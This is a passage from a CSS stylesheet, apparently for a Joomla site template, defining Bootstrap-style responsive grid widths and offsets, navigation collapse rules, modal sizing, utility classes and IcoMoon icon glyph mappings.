	.row-fluid .offset11:first-child {
		margin-left: 93.617021267%;
		*margin-left: 93.510638288277%;
	}
	.row-fluid .offset10 {
		margin-left: 87.234042544%;
		*margin-left: 87.127659565277%;
	}
	.row-fluid .offset10:first-child {
		margin-left: 85.10638297%;
		*margin-left: 84.999999991277%;
	}
	.row-fluid .offset9 {
		margin-left: 78.723404247%;
		*margin-left: 78.617021268277%;
	}
	.row-fluid .offset9:first-child {
		margin-left: 76.595744673%;
		*margin-left: 76.489361694277%;
	}
	.row-fluid .offset8 {
		margin-left: 70.21276595%;
		*margin-left: 70.106382971277%;
	}
	.row-fluid .offset8:first-child {
		margin-left: 68.085106376%;
		*margin-left: 67.978723397277%;
	}
	.row-fluid .offset7 {
		margin-left: 61.702127653%;
		*margin-left: 61.595744674277%;
	}
	.row-fluid .offset7:first-child {
		margin-left: 59.574468079%;
		*margin-left: 59.468085100277%;
	}
	.row-fluid .offset6 {
		margin-left: 53.191489356%;
		*margin-left: 53.085106377277%;
	}
	.row-fluid .offset6:first-child {
		margin-left: 51.063829782%;
		*margin-left: 50.957446803277%;
	}
	.row-fluid .offset5 {
		margin-left: 44.680851059%;
		*margin-left: 44.574468080277%;
	}
	.row-fluid .offset5:first-child {
		margin-left: 42.553191485%;
		*margin-left: 42.446808506277%;
	}
	.row-fluid .offset4 {
		margin-left: 36.170212762%;
		*margin-left: 36.063829783277%;
	}
	.row-fluid .offset4:first-child {
		margin-left: 34.042553188%;
		*margin-left: 33.936170209277%;
	}
	.row-fluid .offset3 {
		margin-left: 27.659574465%;
		*margin-left: 27.553191486277%;
	}
	.row-fluid .offset3:first-child {
		margin-left: 25.531914891%;
		*margin-left: 25.425531912277%;
	}
	.row-fluid .offset2 {
		margin-left: 19.148936168%;
		*margin-left: 19.042553189277%;
	}
	.row-fluid .offset2:first-child {
		margin-left: 17.021276594%;
		*margin-left: 16.914893615277%;
	}
	.row-fluid .offset1 {
		margin-left: 10.638297871%;
		*margin-left: 10.531914892277%;
	}
	.row-fluid .offset1:first-child {
		margin-left: 8.510638297%;
		*margin-left: 8.4042553182766%;
	}
	input,
	textarea,
	.uneditable-input {
		margin-left: 0;
	}
	.controls-row [class*="span"] + [class*="span"] {
		margin-left: 20px;
	}
	input.span12,
	textarea.span12,
	.uneditable-input.span12 {
		width: 710px;
	}
	input.span11,
	textarea.span11,
	.uneditable-input.span11 {
		width: 648px;
	}
	input.span10,
	textarea.span10,
	.uneditable-input.span10 {
		width: 586px;
	}
	input.span9,
	textarea.span9,
	.uneditable-input.span9 {
		width: 524px;
	}
	input.span8,
	textarea.span8,
	.uneditable-input.span8 {
		width: 462px;
	}
	input.span7,
	textarea.span7,
	.uneditable-input.span7 {
		width: 400px;
	}
	input.span6,
	textarea.span6,
	.uneditable-input.span6 {
		width: 338px;
	}
	input.span5,
	textarea.span5,
	.uneditable-input.span5 {
		width: 276px;
	}
	input.span4,
	textarea.span4,
	.uneditable-input.span4 {
		width: 214px;
	}
	input.span3,
	textarea.span3,
	.uneditable-input.span3 {
		width: 152px;
	}
	input.span2,
	textarea.span2,
	.uneditable-input.span2 {
		width: 90px;
	}
	input.span1,
	textarea.span1,
	.uneditable-input.span1 {
		width: 28px;
	}
}
@media (min-width: 1200px) {
	.row {
		margin-left: -20px;
		*zoom: 1;
	}
	.row:before,
	.row:after {
		display: table;
		content: "";
		line-height: 0;
	}
	.row:after {
		clear: both;
	}
	[class*="span"] {
		float: left;
		min-height: 1px;
		margin-left: 20px;
	}
	.container,
	.navbar-static-top .container,
	.navbar-fixed-top .container,
	.navbar-fixed-bottom .container {
		width: 940px;
	}
	.span12 {
		width: 940px;
	}
	.span11 {
		width: 860px;
	}
	.span10 {
		width: 780px;
	}
	.span9 {
		width: 700px;
	}
	.span8 {
		width: 620px;
	}
	.span7 {
		width: 540px;
	}
	.span6 {
		width: 460px;
	}
	.span5 {
		width: 380px;
	}
	.span4 {
		width: 300px;
	}
	.span3 {
		width: 220px;
	}
	.span2 {
		width: 140px;
	}
	.span1 {
		width: 60px;
	}
	.offset12 {
		margin-left: 980px;
	}
	.offset11 {
		margin-left: 900px;
	}
	.offset10 {
		margin-left: 820px;
	}
	.offset9 {
		margin-left: 740px;
	}
	.offset8 {
		margin-left: 660px;
	}
	.offset7 {
		margin-left: 580px;
	}
	.offset6 {
		margin-left: 500px;
	}
	.offset5 {
		margin-left: 420px;
	}
	.offset4 {
		margin-left: 340px;
	}
	.offset3 {
		margin-left: 260px;
	}
	.offset2 {
		margin-left: 180px;
	}
	.offset1 {
		margin-left: 100px;
	}
	.row-fluid {
		width: 100%;
		*zoom: 1;
	}
	.row-fluid:before,
	.row-fluid:after {
		display: table;
		content: "";
		line-height: 0;
	}
	.row-fluid:after {
		clear: both;
	}
	.row-fluid [class*="span"] {
		display: block;
		width: 100%;
		min-height: 28px;
		-webkit-box-sizing: border-box;
		-moz-box-sizing: border-box;
		box-sizing: border-box;
		float: left;
		margin-left: 2.127659574%;
		*margin-left: 2.0744680846383%;
	}
	.row-fluid [class*="span"]:first-child {
		margin-left: 0;
	}
	.row-fluid .controls-row [class*="span"] + [class*="span"] {
		margin-left: 2.127659574%;
	}
	.row-fluid .span12 {
		width: 99.99999999%;
		*width: 99.946808500638%;
	}
	.row-fluid .span11 {
		width: 91.489361693%;
		*width: 91.436170203638%;
	}
	.row-fluid .span10 {
		width: 82.978723396%;
		*width: 82.925531906638%;
	}
	.row-fluid .span9 {
		width: 74.468085099%;
		*width: 74.414893609638%;
	}
	.row-fluid .span8 {
		width: 65.957446802%;
		*width: 65.904255312638%;
	}
	.row-fluid .span7 {
		width: 57.446808505%;
		*width: 57.393617015638%;
	}
	.row-fluid .span6 {
		width: 48.936170208%;
		*width: 48.882978718638%;
	}
	.row-fluid .span5 {
		width: 40.425531911%;
		*width: 40.372340421638%;
	}
	.row-fluid .span4 {
		width: 31.914893614%;
		*width: 31.861702124638%;
	}
	.row-fluid .span3 {
		width: 23.404255317%;
		*width: 23.351063827638%;
	}
	.row-fluid .span2 {
		width: 14.89361702%;
		*width: 14.840425530638%;
	}
	.row-fluid .span1 {
		width: 6.382978723%;
		*width: 6.3297872336383%;
	}
	.row-fluid .offset12 {
		margin-left: 104.255319138%;
		*margin-left: 104.14893615928%;
	}
	.row-fluid .offset12:first-child {
		margin-left: 102.127659564%;
		*margin-left: 102.02127658528%;
	}
	.row-fluid .offset11 {
		margin-left: 95.744680841%;
		*margin-left: 95.638297862277%;
	}
	.row-fluid .offset11:first-child {
		margin-left: 93.617021267%;
		*margin-left: 93.510638288277%;
	}
	.row-fluid .offset10 {
		margin-left: 87.234042544%;
		*margin-left: 87.127659565277%;
	}
	.row-fluid .offset10:first-child {
		margin-left: 85.10638297%;
		*margin-left: 84.999999991277%;
	}
	.row-fluid .offset9 {
		margin-left: 78.723404247%;
		*margin-left: 78.617021268277%;
	}
	.row-fluid .offset9:first-child {
		margin-left: 76.595744673%;
		*margin-left: 76.489361694277%;
	}
	.row-fluid .offset8 {
		margin-left: 70.21276595%;
		*margin-left: 70.106382971277%;
	}
	.row-fluid .offset8:first-child {
		margin-left: 68.085106376%;
		*margin-left: 67.978723397277%;
	}
	.row-fluid .offset7 {
		margin-left: 61.702127653%;
		*margin-left: 61.595744674277%;
	}
	.row-fluid .offset7:first-child {
		margin-left: 59.574468079%;
		*margin-left: 59.468085100277%;
	}
	.row-fluid .offset6 {
		margin-left: 53.191489356%;
		*margin-left: 53.085106377277%;
	}
	.row-fluid .offset6:first-child {
		margin-left: 51.063829782%;
		*margin-left: 50.957446803277%;
	}
	.row-fluid .offset5 {
		margin-left: 44.680851059%;
		*margin-left: 44.574468080277%;
	}
	.row-fluid .offset5:first-child {
		margin-left: 42.553191485%;
		*margin-left: 42.446808506277%;
	}
	.row-fluid .offset4 {
		margin-left: 36.170212762%;
		*margin-left: 36.063829783277%;
	}
	.row-fluid .offset4:first-child {
		margin-left: 34.042553188%;
		*margin-left: 33.936170209277%;
	}
	.row-fluid .offset3 {
		margin-left: 27.659574465%;
		*margin-left: 27.553191486277%;
	}
	.row-fluid .offset3:first-child {
		margin-left: 25.531914891%;
		*margin-left: 25.425531912277%;
	}
	.row-fluid .offset2 {
		margin-left: 19.148936168%;
		*margin-left: 19.042553189277%;
	}
	.row-fluid .offset2:first-child {
		margin-left: 17.021276594%;
		*margin-left: 16.914893615277%;
	}
	.row-fluid .offset1 {
		margin-left: 10.638297871%;
		*margin-left: 10.531914892277%;
	}
	.row-fluid .offset1:first-child {
		margin-left: 8.510638297%;
		*margin-left: 8.4042553182766%;
	}
	input,
	textarea,
	.uneditable-input {
		margin-left: 0;
	}
	.controls-row [class*="span"] + [class*="span"] {
		margin-left: 20px;
	}
	input.span12,
	textarea.span12,
	.uneditable-input.span12 {
		width: 926px;
	}
	input.span11,
	textarea.span11,
	.uneditable-input.span11 {
		width: 846px;
	}
	input.span10,
	textarea.span10,
	.uneditable-input.span10 {
		width: 766px;
	}
	input.span9,
	textarea.span9,
	.uneditable-input.span9 {
		width: 686px;
	}
	input.span8,
	textarea.span8,
	.uneditable-input.span8 {
		width: 606px;
	}
	input.span7,
	textarea.span7,
	.uneditable-input.span7 {
		width: 526px;
	}
	input.span6,
	textarea.span6,
	.uneditable-input.span6 {
		width: 446px;
	}
	input.span5,
	textarea.span5,
	.uneditable-input.span5 {
		width: 366px;
	}
	input.span4,
	textarea.span4,
	.uneditable-input.span4 {
		width: 286px;
	}
	input.span3,
	textarea.span3,
	.uneditable-input.span3 {
		width: 206px;
	}
	input.span2,
	textarea.span2,
	.uneditable-input.span2 {
		width: 126px;
	}
	input.span1,
	textarea.span1,
	.uneditable-input.span1 {
		width: 46px;
	}
	.thumbnails {
		margin-left: -20px;
	}
	.thumbnails > li {
		margin-left: 20px;
	}
	.row-fluid .thumbnails {
		margin-left: 0;
	}
}
@media (max-width: 979px) {
	body {
		padding-top: 0;
	}
	.navbar-fixed-top,
	.navbar-fixed-bottom {
		position: static;
	}
	.navbar-fixed-top {
		margin-bottom: 18px;
	}
	.navbar-fixed-bottom {
		margin-top: 18px;
	}
	.navbar-fixed-top .navbar-inner,
	.navbar-fixed-bottom .navbar-inner {
		padding: 5px;
	}
	.navbar .container {
		width: auto;
		padding: 0;
	}
	.navbar .brand {
		padding-left: 10px;
		padding-right: 10px;
		margin: 0 0 0 -5px;
	}
	.nav-collapse {
		clear: both;
	}
	.nav-collapse .nav {
		float: none;
		margin: 0 0 9px;
	}
	.nav-collapse .nav > li {
		float: none;
	}
	.nav-collapse .nav > li > a {
		margin-bottom: 2px;
	}
	.nav-collapse .nav > .divider-vertical {
		display: none;
	}
	.nav-collapse .nav .nav-header {
		color: #555;
		text-shadow: none;
	}
	.nav-collapse .nav > li > a,
	.nav-collapse .dropdown-menu a {
		padding: 9px 15px;
		font-weight: bold;
		color: #555;
		-webkit-border-radius: 3px;
		-moz-border-radius: 3px;
		border-radius: 3px;
	}
	.nav-collapse .btn {
		padding: 4px 10px 4px;
		font-weight: normal;
		-webkit-border-radius: 4px;
		-moz-border-radius: 4px;
		border-radius: 4px;
	}
	.nav-collapse .dropdown-menu li + li a {
		margin-bottom: 2px;
	}
	.nav-collapse .nav > li > a:hover,
	.nav-collapse .nav > li > a:focus,
	.nav-collapse .dropdown-menu a:hover,
	.nav-collapse .dropdown-menu a:focus {
		background-color: #f2f2f2;
	}
	.navbar-inverse .nav-collapse .nav > li > a,
	.navbar-inverse .nav-collapse .dropdown-menu a {
		color: #999;
	}
	.navbar-inverse .nav-collapse .nav > li > a:hover,
	.navbar-inverse .nav-collapse .nav > li > a:focus,
	.navbar-inverse .nav-collapse .dropdown-menu a:hover,
	.navbar-inverse .nav-collapse .dropdown-menu a:focus {
		background-color: #111111;
	}
	.nav-collapse.in .btn-group {
		margin-top: 5px;
		padding: 0;
	}
	.nav-collapse .dropdown-menu {
		position: static;
		top: auto;
		left: auto;
		float: none;
		display: none;
		max-width: none;
		margin: 0 15px;
		padding: 0;
		background-color: transparent;
		border: none;
		-webkit-border-radius: 0;
		-moz-border-radius: 0;
		border-radius: 0;
		-webkit-box-shadow: none;
		-moz-box-shadow: none;
		box-shadow: none;
	}
	.nav-collapse .open > .dropdown-menu {
		display: block;
	}
	.nav-collapse .dropdown-menu:before,
	.nav-collapse .dropdown-menu:after {
		display: none;
	}
	.nav-collapse .dropdown-menu .divider {
		display: none;
	}
	.nav-collapse .nav > li > .dropdown-menu:before,
	.nav-collapse .nav > li > .dropdown-menu:after {
		display: none;
	}
	.nav-collapse .navbar-form,
	.nav-collapse .navbar-search {
		float: none;
		padding: 9px 15px;
		margin: 9px 0;
		border-top: 1px solid #f2f2f2;
		border-bottom: 1px solid #f2f2f2;
		-webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,.1), 0 1px 0 rgba(255,255,255,.1);
		-moz-box-shadow: inset 0 1px 0 rgba(255,255,255,.1), 0 1px 0 rgba(255,255,255,.1);
		box-shadow: inset 0 1px 0 rgba(255,255,255,.1), 0 1px 0 rgba(255,255,255,.1);
	}
	.navbar-inverse .nav-collapse .navbar-form,
	.navbar-inverse .nav-collapse .navbar-search {
		border-top-color: #111111;
		border-bottom-color: #111111;
	}
	.navbar .nav-collapse .nav.pull-right {
		float: none;
		margin-left: 0;
	}
	.nav-collapse,
	.nav-collapse.collapse {
		overflow: hidden;
		height: 0;
	}
	.navbar .btn-navbar {
		display: block;
	}
	.navbar-static .navbar-inner {
		padding-left: 10px;
		padding-right: 10px;
	}
}
@media (min-width: 980px) {
	.nav-collapse.collapse {
		height: auto !important;
		overflow: visible !important;
	}
}
.small {
	font-size: 11px;
}
iframe,
svg {
	max-width: 100%;
}
.nowrap {
	white-space: nowrap;
}
.center,
.table td.center,
.table th.center {
	text-align: center;
}
a.disabled,
a.disabled:hover {
	color: #999999;
	background-color: transparent;
	cursor: default;
	text-decoration: none;
}
.hero-unit {
	text-align: center;
}
.hero-unit .lead {
	margin-bottom: 18px;
	font-size: 20px;
	font-weight: 200;
	line-height: 27px;
}
.btn .caret {
	margin-bottom: 7px;
}
.btn.btn-micro .caret {
	margin: 5px 0;
}
.blog-row-rule,
.blog-item-rule {
	border: 0;
}
body.modal {
	padding-top: 0;
}
.row-even,
.row-odd {
	padding: 5px;
	width: 99%;
	border-bottom: 1px solid #ddd;
}
.row-odd {
	background-color: transparent;
}
.row-even {
	background-color: #f9f9f9;
}
.blog-row-rule,
.blog-item-rule {
	border: 0;
}
.row-fluid .row-reveal {
	visibility: hidden;
}
.row-fluid:hover .row-reveal {
	visibility: visible;
}
.btn-wide {
	width: 80%;
}
.nav-list > li.offset > a {
	padding-left: 30px;
	font-size: 12px;
}
.blog-row-rule,
.blog-item-rule {
	border: 0;
}
.row-fluid .offset1 {
	margin-left: 8.382978723%;
}
.row-fluid .offset2 {
	margin-left: 16.89361702%;
}
.row-fluid .offset3 {
	margin-left: 25.404255317%;
}
.row-fluid .offset4 {
	margin-left: 33.914893614%;
}
.row-fluid .offset5 {
	margin-left: 42.425531911%;
}
.row-fluid .offset6 {
	margin-left: 50.93617020799999%;
}
.row-fluid .offset7 {
	margin-left: 59.446808505%;
}
.row-fluid .offset8 {
	margin-left: 67.95744680199999%;
}
.row-fluid .offset9 {
	margin-left: 76.468085099%;
}
.row-fluid .offset10 {
	margin-left: 84.97872339599999%;
}
.row-fluid .offset11 {
	margin-left: 91.489361693%;
}
.navbar .nav > li > a.btn {
	padding: 4px 10px;
	line-height: 18px;
}
.nav-tabs.nav-dark {
	border-bottom: 1px solid #333;
	text-shadow: 1px 1px 1px #000;
}
.nav-tabs.nav-dark > li > a {
	color: #F8F8F8;
}
.nav-tabs.nav-dark > li > a:hover {
	border-color: #333 #333 #111;
	background-color: #777777;
}
.nav-tabs.nav-dark > .active > a,
.nav-tabs.nav-dark > .active > a:hover {
	color: #ffffff;
	background-color: #555555;
	border: 1px solid #222;
	border-bottom-color: transparent;
}
.thumbnail.pull-left {
	margin: 0 10px 10px 0;
}
.thumbnail.pull-right {
	margin: 0 0 10px 10px;
}
.width-10 {
	width: 10px;
}
.width-20 {
	width: 20px;
}
.width-30 {
	width: 30px;
}
.width-40 {
	width: 40px;
}
.width-50 {
	width: 50px;
}
.width-60 {
	width: 60px;
}
.width-70 {
	width: 70px;
}
.width-80 {
	width: 80px;
}
.width-90 {
	width: 90px;
}
.width-100 {
	width: 100px;
}
.height-10 {
	height: 10px;
}
.height-20 {
	height: 20px;
}
.height-30 {
	height: 30px;
}
.height-40 {
	height: 40px;
}
.height-50 {
	height: 50px;
}
.height-60 {
	height: 60px;
}
.height-70 {
	height: 70px;
}
.height-80 {
	height: 80px;
}
.height-90 {
	height: 90px;
}
.height-100 {
	height: 100px;
}
hr.hr-condensed {
	margin: 10px 0;
}
.list-striped,
.row-striped {
	list-style: none;
	line-height: 18px;
	text-align: left;
	vertical-align: middle;
	border-top: 1px solid #ddd;
	margin-left: 0;
}
.list-striped li,
.list-striped dd,
.row-striped .row,
.row-striped .row-fluid {
	border-bottom: 1px solid #ddd;
	padding: 8px;
}
.list-striped li:nth-child(odd),
.list-striped dd:nth-child(odd),
.row-striped .row:nth-child(odd),
.row-striped .row-fluid:nth-child(odd) {
	background-color: #f9f9f9;
}
.list-striped li:hover,
.list-striped dd:hover,
.row-striped .row:hover,
.row-striped .row-fluid:hover {
	background-color: #f5f5f5;
}
.row-striped .row-fluid {
	width: 100%;
	box-sizing: border-box;
}
.row-striped .row-fluid [class*="span"] {
	min-height: 10px;
}
.row-striped .row-fluid [class*="span"] {
	margin-left: 8px;
}
.row-striped .row-fluid [class*="span"]:first-child {
	margin-left: 0;
}
.list-condensed li {
	padding: 4px 5px;
}
.row-condensed .row,
.row-condensed .row-fluid {
	padding: 4px 5px;
}
.list-bordered,
.row-bordered {
	list-style: none;
	line-height: 18px;
	text-align: left;
	vertical-align: middle;
	margin-left: 0;
	border: 1px solid #ddd;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
}
.radio.btn-group input[type=radio] {
	display: none;
}
.radio.btn-group > label {
	-webkit-user-select: none;
	-moz-user-select: none;
	-ms-user-select: none;
	user-select: none;
}
.radio.btn-group > label:first-of-type {
	margin-left: 0;
	-webkit-border-bottom-left-radius: 4px;
	border-bottom-left-radius: 4px;
	-webkit-border-top-left-radius: 4px;
	border-top-left-radius: 4px;
	-moz-border-radius-bottomleft: 4px;
	-moz-border-radius-topleft: 4px;
}
fieldset.radio.btn-group {
	padding-left: 0;
}
.iframe-bordered {
	border: 1px solid #ddd;
}
.tab-content {
	overflow: visible;
}
.tabs-left .tab-content {
	overflow: auto;
}
.nav-tabs > li > span {
	display: block;
	margin-right: 2px;
	padding-right: 12px;
	padding-left: 12px;
	padding-top: 8px;
	padding-bottom: 8px;
	line-height: 18px;
	border: 1px solid transparent;
	-webkit-border-radius: 4px 4px 0 0;
	-moz-border-radius: 4px 4px 0 0;
	border-radius: 4px 4px 0 0;
}
.btn-micro {
	padding: 1px 4px;
	font-size: 10px;
	line-height: 8px;
}
.btn-group > .btn-micro {
	font-size: 10px;
}
.tip-wrap {
	max-width: 200px;
	padding: 3px 8px;
	color: #fff;
	text-align: center;
	text-decoration: none;
	background-color: #000;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
	z-index: 100;
}
.page-header {
	margin: 2px 0px 10px 0px;
	padding-bottom: 5px;
}
.input-prepend > .add-on,
.input-append > .add-on {
	vertical-align: top;
}
.input-prepend .chzn-container-single .chzn-single {
	-webkit-border-radius: 0 3px 3px 0;
	-moz-border-radius: 0 3px 3px 0;
	border-radius: 0 3px 3px 0;
}
.input-prepend .chzn-container-single .chzn-single-with-drop {
	-webkit-border-radius: 0 3px 0 0;
	-moz-border-radius: 0 3px 0 0;
	border-radius: 0 3px 0 0;
}
.input-append .chzn-container-single .chzn-single {
	-webkit-border-radius: 3px 0 0 3px;
	-moz-border-radius: 3px 0 0 3px;
	border-radius: 3px 0 0 3px;
}
.input-append .chzn-container-single .chzn-single-with-drop {
	-webkit-border-radius: 3px 0 0 0;
	-moz-border-radius: 3px 0 0 0;
	border-radius: 3px 0 0 0;
}
.input-prepend.input-append .chzn-container-single .chzn-single,
.input-prepend.input-append .chzn-container-single .chzn-single-with-drop {
	-webkit-border-radius: 0;
	-moz-border-radius: 0;
	border-radius: 0;
}
.element-invisible {
	position: absolute;
	padding: 0;
	margin: 0;
	border: 0;
	height: 1px;
	width: 1px;
	overflow: hidden;
}
.element-invisible:focus {
	width: auto;
	height: auto;
	overflow: auto;
	background: #eee;
	color: #000;
	padding: 1em;
}
.form-vertical .control-label {
	float: none;
	width: auto;
	padding-right: 0;
	padding-top: 0;
	text-align: left;
}
.form-vertical .controls {
	margin-left: 0;
}
.width-auto {
	width: auto;
}
.btn-group .chzn-results {
	white-space: normal;
}
.accordion-body.in:hover {
	overflow: visible;
}
.invalid {
	color: #9d261d;
	font-weight: bold;
}
input.invalid {
	border: 1px solid #9d261d;
	background: #f2dede;
}
select.chzn-done.invalid + .chzn-container.chzn-container-single > a.chzn-single,
select.chzn-done.invalid + .chzn-container.chzn-container-multi > ul.chzn-choices {
	border-color: #9d261d;
	color: #9d261d;
}
.tooltip {
	max-width: 400px;
}
.tooltip-inner {
	max-width: none;
	text-align: left;
	text-shadow: none;
}
th .tooltip-inner {
	font-weight: normal;
}
.tooltip.hasimage {
	opacity: 1;
}
.tip-text {
	text-align: left;
}
.btn-group > .btn + .dropdown-backdrop + .btn {
	margin-left: -1px;
}
.btn-group > .btn + .dropdown-backdrop + .dropdown-toggle {
	padding-left: 8px;
	padding-right: 8px;
	-webkit-box-shadow: inset 1px 0 0 rgba(255,255,255,.125), inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05);
	-moz-box-shadow: inset 1px 0 0 rgba(255,255,255,.125), inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05);
	box-shadow: inset 1px 0 0 rgba(255,255,255,.125), inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05);
	*padding-top: 5px;
	*padding-bottom: 5px;
}
.btn-group > .btn-mini + .dropdown-backdrop + .dropdown-toggle {
	padding-left: 5px;
	padding-right: 5px;
	*padding-top: 2px;
	*padding-bottom: 2px;
}
.btn-group > .btn-small + .dropdown-backdrop + .dropdown-toggle {
	*padding-top: 5px;
	*padding-bottom: 4px;
}
.btn-group > .btn-large + .dropdown-backdrop + .dropdown-toggle {
	padding-left: 12px;
	padding-right: 12px;
	*padding-top: 7px;
	*padding-bottom: 7px;
}
.dropdown-menu {
	text-align: left;
}
.alert-link {
	font-weight: bold;
}
.alert .alert-link {
	color: #a47e3c;
}
.alert-success .alert-link {
	color: #356635;
}
.alert-danger .alert-link,
.alert-error .alert-link {
	color: #953b39;
}
.alert-info .alert-link {
	color: #2d6987;
}
div.modal {
	position: fixed;
	top: 5%;
	left: 50%;
	z-index: 1050;
	width: 80%;
	margin-left: -40%;
	background-color: #fff;
	border: 1px solid #999;
	border: 1px solid rgba(0,0,0,0.3);
	*border: 1px solid #999;
	-webkit-border-radius: 6px;
	-moz-border-radius: 6px;
	border-radius: 6px;
	-webkit-box-shadow: 0 3px 7px rgba(0,0,0,0.3);
	-moz-box-shadow: 0 3px 7px rgba(0,0,0,0.3);
	box-shadow: 0 3px 7px rgba(0,0,0,0.3);
	-webkit-background-clip: padding-box;
	-moz-background-clip: padding-box;
	background-clip: padding-box;
	outline: none;
}
div.modal.fade {
	-webkit-transition: opacity .3s linear, top .3s ease-out;
	-moz-transition: opacity .3s linear, top .3s ease-out;
	-o-transition: opacity .3s linear, top .3s ease-out;
	transition: opacity .3s linear, top .3s ease-out;
	top: -25%;
}
div.modal.fade.in {
	top: 5%;
}
.modal-batch {
	overflow-y: visible;
}
.modal-body[class^="jviewport-height"],
.modal-body[class*="jviewport-height"] {
	max-height: none;
}
.jviewport-height10 {
	height: 10vh;
}
.jviewport-height20 {
	height: 20vh;
}
.jviewport-height30 {
	height: 30vh;
}
.jviewport-height40 {
	height: 40vh;
}
.jviewport-height50 {
	height: 50vh;
}
.jviewport-height60 {
	height: 60vh;
}
.jviewport-height70 {
	height: 70vh;
}
.jviewport-height80 {
	height: 80vh;
}
.jviewport-height90 {
	height: 90vh;
}
.jviewport-height100 {
	height: 100vh;
}
div.modal.jviewport-width10 {
	width: 10vw;
	margin-left: -5vw;
}
div.modal.jviewport-width20 {
	width: 20vw;
	margin-left: -10vw;
}
div.modal.jviewport-width30 {
	width: 30vw;
	margin-left: -15vw;
}
div.modal.jviewport-width40 {
	width: 40vw;
	margin-left: -20vw;
}
div.modal.jviewport-width50 {
	width: 50vw;
	margin-left: -25vw;
}
div.modal.jviewport-width60 {
	width: 60vw;
	margin-left: -30vw;
}
div.modal.jviewport-width70 {
	width: 70vw;
	margin-left: -35vw;
}
div.modal.jviewport-width80 {
	width: 80vw;
	margin-left: -40vw;
}
div.modal.jviewport-width90 {
	width: 90vw;
	margin-left: -45vw;
}
div.modal.jviewport-width100 {
	width: 100vw;
	margin-left: -50vw;
}
@media (max-width: 767px) {
	div.modal {
		position: fixed;
		top: 20px;
		left: 20px;
		right: 20px;
		width: auto;
		margin: 0;
	}
	div.modal.fade {
		top: -100px;
	}
	div.modal.fade.in {
		top: 20px;
	}
	div.modal[class*="jviewport-width"] {
		width: auto;
		margin: 0;
	}
}
@media (max-width: 480px) {
	div.modal {
		top: 10px;
		left: 10px;
		right: 10px;
	}
}
@font-face {
	font-family: 'IcoMoon';
	src: url('../../../media/jui/fonts/IcoMoon.eot');
	src: url('../../../media/jui/fonts/IcoMoon.eot?#iefix') format('embedded-opentype'), url('../../../media/jui/fonts/IcoMoon.woff') format('woff'), url('../../../media/jui/fonts/IcoMoon.ttf') format('truetype'), url('../../../media/jui/fonts/IcoMoon.svg#IcoMoon') format('svg');
	font-weight: normal;
	font-style: normal;
}
[data-icon]:before {
	font-family: 'IcoMoon';
	content: attr(data-icon);
	speak: none;
}
[class^="icon-"],
[class*=" icon-"] {
	display: inline-block;
	width: 14px;
	height: 14px;
	margin-right: .25em;
	line-height: 14px;
}
[class^="icon-"]:before,
[class*=" icon-"]:before {
	font-family: 'IcoMoon';
	font-style: normal;
	speak: none;
}
[class^="icon-"].disabled,
[class*=" icon-"].disabled {
	font-weight: normal;
}
.icon-joomla:before {
	content: "\e200";
}
.icon-chevron-up:before,
.icon-uparrow:before,
.icon-arrow-up:before {
	content: "\e005";
}
.icon-chevron-right:before,
.icon-rightarrow:before,
.icon-arrow-right:before {
	content: "\e006";
}
.icon-chevron-down:before,
.icon-downarrow:before,
.icon-arrow-down:before {
	content: "\e007";
}
.icon-chevron-left:before,
.icon-leftarrow:before,
.icon-arrow-left:before {
	content: "\e008";
}
.icon-arrow-first:before {
	content: "\e003";
}
.icon-arrow-last:before {
	content: "\e004";
}
.icon-arrow-up-2:before {
	content: "\e009";
}
.icon-arrow-right-2:before {
	content: "\e00a";
}
.icon-arrow-down-2:before {
	content: "\e00b";
}
.icon-arrow-left-2:before {
	content: "\e00c";
}
.icon-arrow-up-3:before {
	content: "\e00f";
}
.icon-arrow-right-3:before {
	content: "\e010";
}
.icon-arrow-down-3:before {
	content: "\e011";
}
.icon-arrow-left-3:before {
	content: "\e012";
}
.icon-menu-2:before {
	content: "\e00e";
}
.icon-arrow-up-4:before {
	content: "\e201";
}
.icon-arrow-right-4:before {
	content: "\e202";
}
.icon-arrow-down-4:before {
	content: "\e203";
}
.icon-arrow-left-4:before {
	content: "\e204";
}
.icon-share:before,
.icon-redo:before {
	content: "\27";
}
.icon-undo:before {
	content: "\28";
}
.icon-forward-2:before {
	content: "\e205";
}
.icon-backward-2:before,
.icon-reply:before {
	content: "\e206";
}
.icon-unblock:before,
.icon-refresh:before,
.icon-redo-2:before {
	content: "\6c";
}
.icon-undo-2:before {
	content: "\e207";
}
.icon-move:before {
	content: "\7a";
}
.icon-expand:before {
	content: "\66";
}
.icon-contract:before {
	content: "\67";
}
.icon-expand-2:before {
	content: "\68";
}
.icon-contract-2:before {
	content: "\69";
}
.icon-play:before {
	content: "\e208";
}
.icon-pause:before {
	content: "\e209";
}
.icon-stop:before {
	content: "\e210";
}
.icon-previous:before,
.icon-backward:before {
	content: "\7c";
}
.icon-next:before,
.icon-forward:before {
	content: "\7b";
}
.icon-first:before {
	content: "\7d";
}
.icon-last:before {
	content: "\e000";
}
.icon-play-circle:before {
	content: "\e00d";
}
.icon-pause-circle:before {
	content: "\e211";
}
.icon-stop-circle:before {
	content: "\e212";
}
.icon-backward-circle:before {
	content: "\e213";
}
.icon-forward-circle:before {
	content: "\e214";
}
.icon-loop:before {
	content: "\e001";
}
.icon-shuffle:before {
	content: "\e002";
}
.icon-search:before {
	content: "\53";
}
.icon-zoom-in:before {
	content: "\64";
}
.icon-zoom-out:before {
	content: "\65";
}
.icon-apply:before,
.icon-edit:before,
.icon-pencil:before {
	content: "\2b";
}
.icon-pencil-2:before {
	content: "\2c";
}
.icon-brush:before {
	content: "\3b";
}
.icon-save-new:before,
.icon-plus-2:before {
	content: "\5d";
}
.icon-minus-sign:before,
.icon-minus-2:before {
	content: "\5e";
}
.icon-delete:before,
.icon-remove:before,
.icon-cancel-2:before {
	content: "\49";
}
.icon-publish:before,
.icon-save:before,
.icon-ok:before,
.icon-checkmark:before {
	content: "\47";
}
.icon-new:before,
.icon-plus:before {
	content: "\2a";
}
.icon-plus-circle:before {
	content: "\e215";
}
.icon-minus:before,
.icon-not-ok:before {
	content: "\4b";
}
.icon-ban-circle:before,
.icon-minus-circle:before {
	content: "\e216";
}
.icon-unpublish:before,
.icon-cancel:before {
	content: "\4a";
}
